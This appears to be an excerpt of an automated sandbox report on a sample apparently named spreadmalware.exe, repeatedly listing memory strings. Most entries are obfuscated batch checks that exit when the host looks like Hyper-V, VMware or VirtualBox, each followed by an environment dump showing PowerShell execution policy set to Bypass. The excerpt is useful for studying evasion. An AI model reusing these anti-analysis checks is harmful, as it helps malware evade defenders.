"%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O,
Source: cmd.exe, 0000000B.00000003.1417116659.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o3
Source: cmd.exe, 0000000B.00000003.1422079685.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o6
Source: spreadmalware.exe, 00000001.00000002.1293213738.000000001B9C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: cmd.exe, 0000000B.00000003.1436828284.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O
Source: cmd.exe, 0000000B.00000003.1417398269.000002C1DCA5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o@
Source: cmd.exe, 0000000B.00000003.1413237953.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=occ
Source: WMIC.exe, 0000001A.00000003.1453855592.000002894DAD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O
Source: cmd.exe, 0000000B.00000003.1425496788.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: yHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o0
Source: cmd.exe, 0000000B.00000003.1421484801.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o\\
Source: powershell.exe, 0000002E.00000002.1683787137.000002DE7F500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O#
Source: taskkill.exe, 0000004D.00000002.1779424801.000002146F254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program 